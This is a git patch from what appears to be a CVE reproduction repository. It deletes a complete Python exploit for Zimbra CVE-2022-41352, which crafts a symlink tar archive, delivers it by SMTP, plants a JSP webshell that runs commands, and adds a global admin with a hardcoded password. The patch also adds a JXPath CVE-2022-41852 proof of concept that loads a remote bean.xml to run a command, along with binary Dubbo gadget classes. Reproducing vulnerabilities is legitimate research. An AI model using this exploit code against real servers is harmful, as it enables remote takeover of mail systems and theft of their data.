From a6e23d52d1a3efabaad15d7535cf9adee550b316 Mon Sep 17 00:00:00 2001
From: FU Yunhao <19373124@buaa.edu.cn>
Date: Thu, 18 May 2023 22:21:51 +0800
Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-41852?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../2022/CVE-2022-41352/CVE-2022-41352.py | 236 ------------------
.../2022/CVE-2022-41852/README.md | 7 +
.../CVE-2022-41852/target/CVE_2022_41852.java | 13 +
.../2022/CVE-2022-41852/target/bean.xml | 16 ++
.../2022/CVE-2022-41852/target/pom.xml | 31 +++
.../2022/yaml/CVE-2022-41852.yaml | 18 ++
.../classes/DubboGadget/DubboGadget.class | Bin 0 -> 2270 bytes
.../classes/DubboGadget/Utils$Foo.class | Bin 0 -> 424 bytes
.../Utils$StubTransletPayload.class | Bin 0 -> 1362 bytes
.../target/classes/DubboGadget/Utils.class | Bin 0 -> 8374 bytes
openkylin_list.yaml | 1 +
11 files changed, 86 insertions(+), 236 deletions(-)
delete mode 100644 cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py
create mode 100644 cve/apache-Commons/2022/CVE-2022-41852/README.md
create mode 100644 cve/apache-Commons/2022/CVE-2022-41852/target/CVE_2022_41852.java
create mode 100644 cve/apache-Commons/2022/CVE-2022-41852/target/bean.xml
create mode 100644 cve/apache-Commons/2022/CVE-2022-41852/target/pom.xml
create mode 100644 cve/apache-Commons/2022/yaml/CVE-2022-41852.yaml
create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/DubboGadget.class
create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$Foo.class
create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$StubTransletPayload.class
create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils.class
diff --git a/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py
deleted file mode 100644
index f447f3d2..00000000
--- a/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py
+++ /dev/null
@@ -1,236 +0,0 @@
-#!/usr/bin/env python3
-
-import sys
-import smtplib
-import argparse
-from time import sleep
-from email.mime.multipart import MIMEMultipart
-from email.mime.application import MIMEApplication
-from email.mime.text import MIMEText
-import requests
-from requests.packages.urllib3.exceptions import InsecureRequestWarning
-
-# CONFIGURATION
-#----------------------------------
-TARGET = 'mail.test.org'
-WEBSHELL_PATH = '/public/jsp'
-WEBSHELL_NAME = 'Startup1_3.jsp'
-ATTACHMENT = 'payload.tar'
-SENDER = 'test@test.org'
-RECIPIENT = 'admin@test.org'
-
-EMAIL_SUBJECT = 'CVE-2022-41352'
-EMAIL_BODY = 'Just testing.
Don\'t mind me.
'
-#----------------------------------
-
-# Only change this if zimbra was not installed in the default location
-UPLOAD_BASE = '/opt/zimbra/jetty_base/webapps/zimbra'
-
-
-def create_tar_payload(payload, payload_name, payload_path, lnk='startup'):
- # Block 1
- link = lnk.encode()
- mode = b'0000777\x00' # link permissions
- ouid = b'0001745\x00' # octal uid (997)
- ogid = b'0001745\x00' # octal gid
- lnsz = b'00000000000\x00' # file size (link = 0)
- lmod = b'14227770134\x00' # last modified (octal unix)
- csum = b' ' # checksum = 8 blanks
- type = b'2' # type (link = 2)
- targ = payload_path.encode() # link target
- magi = b'ustar \x00' # ustar magic bytes + version
- ownu = b'zimbra' # user owner
- owng = b'zimbra' # group owner
- vers = b'\x00'*8 + b'\x00'* 8 # device major and minor
- pref = b'\x00'*155 # prefix (only used if the file name length exceeds 100)
-
- raw_b1_1 = link + b'\x00'*(100-len(link)) + mode + ouid + ogid + lnsz + lmod
- raw_b1_2 = type + targ + b'\x00'*(100-len(targ)) + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref
- # calculate and insert checksum
- csum = oct(sum(b for b in raw_b1_1+csum+raw_b1_2))[2:]
- raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2
- # pad block to 512
- raw_b1 += b'\00'*(512-len(raw_b1))
-
- # Block 2
- mode = b'0000644\x00' # file permissions
- file = f'{lnk}/{payload_name}'.encode()
- flsz = oct(len(payload))[2:] # file size
- csum = b' ' # checksum = 8 blanks
- type = b'0' # type (file = 0)
- targ = b'\x00'*100 # link target = none
-
- raw_b2_1 = file + b'\x00'*(100-len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod
- raw_b2_2 = type + targ + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref
- # calculate and insert checksum
- csum = oct(sum(b for b in raw_b2_1+csum+raw_b2_2))[2:]
- raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2
- # pad block to 512
- raw_b2 += b'\00'*(512-len(raw_b2))
-
-
- # Assemble
- raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512))
- raw_tar += b'\x00' * 512 * 2 # Trailer: end with 2 empty blocks
-
- return raw_tar
-
-# Update this if you want to use a legit email account for sending the payload
-def smtp_send_file(target, sender, recipient, subject, body, attachment, attachment_name):
- msg = MIMEMultipart()
- msg['Subject'] = subject
- msg['From'] = sender
- msg['To'] = recipient
-
- message = MIMEText(body, 'html')
- msg.attach(message)
-
- att = MIMEApplication(attachment)
- att.add_header('Content-Disposition', 'attachment', filename=attachment_name)
- msg.attach(att)
-
- try:
- print(f'>>> Sending payload')
- smtp_server = smtplib.SMTP(target,25)
- smtp_server.sendmail(sender, recipient, msg.as_string())
- print(f'>>> Payload delivered')
- except Exception as e:
- print(f'[!] Failed to send the mail: {e}')
- sys.exit(1)
-
-def verify_upload(target, shell, path):
- print(f'>>> Verifying upload to {path}/{shell} ...')
- sleep(5) # give the server time to process the email
- resp = requests.get(f'https://{target}{path}/{shell}', verify=False)
- if resp.status_code == 200:
- print(f'>>> [PWNED] Upload successful!')
- else:
- print(f'>>> Upload unsuccesful :(')
- sys.exit(1)
-
-def create_new_zimbra_admin(target, shell, path):
- url = f'https://{target}'
- pw = 'Pwn1ng_Z1mbra_!s_fun'
- print(f'>>> Adding a new global administrator')
- if (input(f'>>> Are you sure you want to continue? (yN): ') != 'y'):
- sys.exit(0)
- admin = input(f'>>> Enter the new admin email (newadmin@domain.com): ')
- r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ca {admin} {pw}', verify=False)
- r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ma {admin} zimbraIsAdminAccount TRUE', verify=False)
-
- print(f'>>> Login to {url}:7071/zimbraAdmin/ with:')
- print(f'>>> Email : {admin}')
- print(f'>>> Password : {pw}')
-
-
-def main(args):
- global TARGET,WEBSHELL_PATH,WEBSHELL_NAME,ATTACHMENT,SENDER,RECIPIENT,EMAIL_SUBJECT,EMAIL_BODY
-
- # Kali JSP WebShell
- payload = b'<%@ page import="java.io.*" %><% String cmd=request.getParameter("task");String output="";if(cmd!=null){String s=null;try {Process p=Runtime.getRuntime().exec(cmd);BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine())!=null){output+=s;}}catch(IOException e){e.printStackTrace();}} %><%=output %>
'
-
- # Using this instead of argparse default values to allow easy manual configuration as well
- if args.payload:
- try:
- with open(args.payload, 'rb') as f:
- payload = f.read()
- except Exception as e:
- print(f'Failed to read {args.payload}: {e}')
- sys.exit(1)
- print(f'>>> Using custom payload from: {args.payload}')
- else:
- print(f'>>> Using default payload: JSP Webshell')
- if args.path:
- WEBSHELL_PATH = args.path
- if args.file:
- WEBSHELL_NAME = args.file
- if args.attach:
- ATTACHMENT = args.attach
-
- tar = create_tar_payload(payload, WEBSHELL_NAME, UPLOAD_BASE+WEBSHELL_PATH)
-
- print(f'>>> Assembled payload attachment: {ATTACHMENT}')
- print(f'>>> Payload will be extracted to ({UPLOAD_BASE}){WEBSHELL_PATH}/{WEBSHELL_NAME}')
- if args.mode == 'manual':
- with open(ATTACHMENT, 'wb') as f:
- f.write(tar)
- print(f'>>> Attachment saved locally.')
- sys.exit(0)
-
- if args.target:
- TARGET = args.target
-
- print(f'>>> Targeting {TARGET}')
-
- if args.sender:
- SENDER = args.sender
- if args.recip:
- RECIPIENT = args.recip
- if args.subject:
- EMAIL_SUBJECT = args.subject
- if args.body:
- try:
- with open(args.body, 'rb') as f:
- EMAIL_BODY = f.read().decode()
- except Exception as e:
- print(f'Failed to read {args.body}: {e}')
- sys.exit(1)
- print(f'>>> Using custom email body from: {args.body}')
-
-
- smtp_send_file( TARGET,
- SENDER,
- RECIPIENT,
- EMAIL_SUBJECT,
- EMAIL_BODY,
- tar,
- ATTACHMENT )
-
- requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
-
- verify_upload(TARGET, WEBSHELL_NAME, WEBSHELL_PATH)
-
- print(f'>>> Shell at: https://{TARGET}{WEBSHELL_PATH}/{WEBSHELL_NAME}')
- if args.mode == 'auto':
- sys.exit(0)
-
- if args.payload:
- print(f'>>> (!) "fullpwn" depends on the default JSP webshell - won\'t create the admin account')
- else:
- create_new_zimbra_admin(TARGET, WEBSHELL_NAME, WEBSHELL_PATH)
-
- sys.exit(0)
-
-if __name__ == '__main__':
- epi = '''
-Alternatively, edit the script to change the default configuration.
-
-The available modes are:
-
- manual : Only create the payload - you have to deploy the payload yourself.
- auto : Create a webshell and deploy it via SMTP.
- fullpwn : After deploying a webshell, add a new global mail administrator.
-'''
-
- p = argparse.ArgumentParser(
- description = 'CVE-2022-41352 Zimbra RCE',
- formatter_class = argparse.RawDescriptionHelpFormatter,
- epilog = epi
- )
- p.add_argument('mode', metavar='mode', choices=['manual', 'auto', 'fullpwn'], help='(manual|auto|fullpwn) - see below')
-
- p.add_argument('--target', required=False, metavar='', dest='target', help=f'the target server (default: "{TARGET}")')
- p.add_argument('--payload', required=False, metavar='', help='the file to save on the target (default: jsp webshell)')
- p.add_argument('--path', required=False, metavar='', help=f'relative path for the file upload (default: "{WEBSHELL_PATH}")')
- p.add_argument('--file', required=False, metavar='', help=f'name of the uploaded file (default: "{WEBSHELL_NAME}")')
- p.add_argument('--attach', required=False, metavar='', help=f'name of the email attachment containing the payload (default: "{ATTACHMENT}")')
- p.add_argument('--sender', required=False, metavar='', help=f'sender mail address (default: "{SENDER}")')
- p.add_argument('--recip', required=False, metavar='', help=f'recipient mail address (default: "{RECIPIENT}") (if you can deploy the email directly to the server, neither the sender nor the recipient have to exist for the exploit to work)')
- p.add_argument('--subject', required=False, metavar='', help=f'subject to use in the email (default: "{EMAIL_SUBJECT}")')
- p.add_argument('--body', required=False, metavar='', help=f'file containing the html content for the email body (default: "{EMAIL_BODY}")')
-
- args = p.parse_args()
-
- main(args)
\ No newline at end of file
diff --git a/cve/apache-Commons/2022/CVE-2022-41852/README.md b/cve/apache-Commons/2022/CVE-2022-41852/README.md
new file mode 100644
index 00000000..8085af9d
--- /dev/null
+++ b/cve/apache-Commons/2022/CVE-2022-41852/README.md
@@ -0,0 +1,7 @@
+# CVE-2022-41852
+
+```
+python3 -m http.server 8080
+java CVE_2022_41852.java
+```
+导入pom.xml,同时在bean.xml目录下在8080端口创建web服务器后运行CVE_2022_41852.java,看到8080端口收到了请求,能够弹出计算器
\ No newline at end of file
diff --git a/cve/apache-Commons/2022/CVE-2022-41852/target/CVE_2022_41852.java b/cve/apache-Commons/2022/CVE-2022-41852/target/CVE_2022_41852.java
new file mode 100644
index 00000000..d6415004
--- /dev/null
+++ b/cve/apache-Commons/2022/CVE-2022-41852/target/CVE_2022_41852.java
@@ -0,0 +1,13 @@
+import org.apache.commons.jxpath.JXPathContext;
+
+public class CVE_2022_41852 {
+ public static void main(String[] args) {
+ try{
+ JXPathContext context = JXPathContext.newContext(null);
+ String key = (String) context.getValue("org.springframework.context.support.ClassPathXmlApplicationContext.new(\"http://127.0.0.1:8080/bean.xml\")");
+ System.out.println(key);
+ }catch (Exception exception){
+ exception.printStackTrace();
+ }
+ }
+}
diff --git a/cve/apache-Commons/2022/CVE-2022-41852/target/bean.xml b/cve/apache-Commons/2022/CVE-2022-41852/target/bean.xml
new file mode 100644
index 00000000..6f4b0e76
--- /dev/null
+++ b/cve/apache-Commons/2022/CVE-2022-41852/target/bean.xml
@@ -0,0 +1,16 @@
+
+
+
+
+
+ bash
+ -c
+ calc.exe
+
+
+
+
\ No newline at end of file
diff --git a/cve/apache-Commons/2022/CVE-2022-41852/target/pom.xml b/cve/apache-Commons/2022/CVE-2022-41852/target/pom.xml
new file mode 100644
index 00000000..6657f7df
--- /dev/null
+++ b/cve/apache-Commons/2022/CVE-2022-41852/target/pom.xml
@@ -0,0 +1,31 @@
+
+
+ 4.0.0
+
+ org.example
+ poc_cve_2022_41852
+ 1.0-SNAPSHOT
+
+
+ 8
+ 8
+
+
+
+
+
+ org.springframework
+ spring-context-support
+ 5.3.23
+
+
+
+ commons-jxpath
+ commons-jxpath
+ 1.3
+
+
+
+
diff --git a/cve/apache-Commons/2022/yaml/CVE-2022-41852.yaml b/cve/apache-Commons/2022/yaml/CVE-2022-41852.yaml
new file mode 100644
index 00000000..c5bfe098
--- /dev/null
+++ b/cve/apache-Commons/2022/yaml/CVE-2022-41852.yaml
@@ -0,0 +1,18 @@
+id: CVE-2022-41852
+source: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47061
+info:
+ name: JXPath是apache公司提供的XPath的java实现,JXPath 提供了用于遍历 JavaBean、DOM 和其他类型的对象的图形的 API,同时提供了一套扩展机制使我们可以增加对这些对象之外的其他对象模型的支持(重点).
+ severity: CRITICAL
+ description:
+ 使用JXPath解释不受信任的XPath表达式的人可能容易受到远程代码执行攻击。处理XPath字符串的所有JXPathContext类函数都是易受攻击的,除了compile和compileath函数。XPath表达式可以被攻击者用来从类路径加载任何Java类,从而导致代码执行。
+ scope-of-influence:
+ Apache Commons JXpath <= 1.3
+ reference:
+ - https://blog.csdn.net/Xxy605/article/details/127303526
+ classification:
+ cvss-metrics: Google Inc. AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H
+ cve-id: CVE-2022-41852
+ cwe-id: None
+ cnvd-id: None
+ kve-id: None
+ tags: CVE-2022, Apache Commons Jxpath
diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/DubboGadget.class b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/DubboGadget.class
new file mode 100644
index 0000000000000000000000000000000000000000..b67caf0a1e5aee076ad30e3f70c9e46a6e019ac5
GIT binary patch
literal 2270
zcmah~X;a%)6g>jlGC~Ammc%TfbRlN5o0hf#6Iu);kQ$qYEiP%PY%7k4ZMn9bK>MfK
zWCoZr(@*`>AJyr3k{21fQ)Y~$r}NG|_uTug{{H8WKLIS_R~cOr?rc=kY4eGe&FNOe
zbuYssVc=AIqeb#sF&9auPxXu?;r7NsES5ZZw!V3?p4{14OKeC8#GAN1t85f=Q3?K)
zOx`FO)~bZ=(9EF(&$^k_{pjVZjF!)Y^)tN(68cnl;girGH;Q_qT1e~VeJ!2W1+7Wo
zp;k7;b8XSLVv{Q9MnJ^?{3Nzs85Ie^xJ$k}6^ii`G@~eCBy`*^RcKQ-&oX++GR$H{
zMo_|FGoi*Cg<{84jAMevFn`C9UF|$?YFWYEf%-Tmc1^1I08(Ki@ek-)@j8oMxO2^6AntjJOX}vN@Gp4R1uG#srVd=
ztaYi%E_v7?SbMCQ_9cPEC6UJ{ijrChTe&
zW<=PyRxWGj$*M)2q|~*7f+YlGJYv8)&f#kXt>A0XZ{M)dYRQq%4T;ViDp)~G#X5K>
zdf%1}OLv$g47&}f%O!pZk5xRu7V(zZkVjubGsiIrG7C}AifpeQt6t95^H$?xZ=9ME
zrsDroIi3ZHI8RzL*-w*B0shMwg1b$D8*kv+or(5fABQpyTE@lRd4+;i9O1bj5j`>7
zAlVhiz%ifw_I>L{dwwWL;f1h!O2Lo#NybV2Oj4_By9y0y+GHQBJWqIw&rZv*E3}mua~;v`F7FO5m~&D@rtFc!<@WZFgctGg|8*tZ8n4pVfRB0G@%GuuCUj#
z4vmDNP={U>Gwo*;WzccIRcrX0*ji3@3B}aA*KoB{CUyk{Y^(um%Y+!8IK>8SQTEJg
zIio)|#QYs_4VbVn0#h7j-TZj49mUY*oezG<{D~D{npg4X3n=fQ{?5BD+!D|Bx{7{#
zMeOI`uI-8NDt38iFLC?k7RBD8Isgn}h`=5UV}!(ac<b
z+-tJkvSs&E>HvDlBZLSJ;_)Fq;#FosALA3U^oSAP#{U-?Wa3t5uP`0I#(e4$;hp(F
zWbOhFj^?lMMdBJuT#PPzuCbB|dM>fL>$~uC%D$l{bNXCm(GNl
z>vwp@2vM$!+2|M&twG)+@%gQi)*`>rzd+f0w`Vg_h%{oMla6_Bb5Pd5gCznG$1VOD#EY!kl>?9UKAQ++ra{V4`aLKV7Z}%+xS5_t#{s4c7
zr9Z(qEOuJVo0&J0c{B6z{q_#v0*5}f7+U>2N%WA<7s5tUD^qhk(Ar0lp|<2tJW9D*
zM0d$j%&d9l$9PXh_elxB^BIO?l5M1s6
literal 0
HcmV?d00001
diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$StubTransletPayload.class b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$StubTransletPayload.class
new file mode 100644
index 0000000000000000000000000000000000000000..d58f75bf6a7b84030571615ad72b4f083163037d
GIT binary patch
literal 1362
zcmbu9$!-%t5QhJJUw(Z04B!Tqi^vfcYH_O-JrwO-
z>AW4M0z1Fu;?}ki+6K}+6R(3vw2LSZ?)p*a*;sp#+4aP}@b{$G5rNR2(oPyJ0
zla0t1K~r#4j@WY++@7+8#l}D~R0$(|B5hwpCM1}p#-Nhao^Dp3XRZ!|Bl)@-r~_$^
z)Nw4wBca=YG}Yv!<@+69?k8Sb#96}4K~p%qg-dyh}Tj$3qTx65<s
z;&Ft38#yFJ#%PRke}X+8kHq89%14ZSNS91-Kb$&OG0F2vcLAm_%@*M#PBG{-&kJmw
zNilcW$|qm{M%+pfv)zw9L;{(?xfDw{j|+@TuosVE>uHb->{^Ol;S3U3H?u#nmoUq?
a#5ae_96pCDY~?VI1s==nCtSr6Mt%a1&3H5b
literal 0
HcmV?d00001
diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils.class b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils.class
new file mode 100644
index 0000000000000000000000000000000000000000..4cabf006451dfdcbec54fe642c88bffa43efcce3
GIT binary patch
literal 8374
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
literal 0
HcmV?d00001
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index b6df6461..2d037bdc 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -46,6 +46,7 @@ cve:
- CVE-2022-32532
apache-Commons:
- CVE-2022-33980
+ - CVE-2022-41852
influx-DB:
- CVE-2019-20933
linux-kernel:
--
Gitee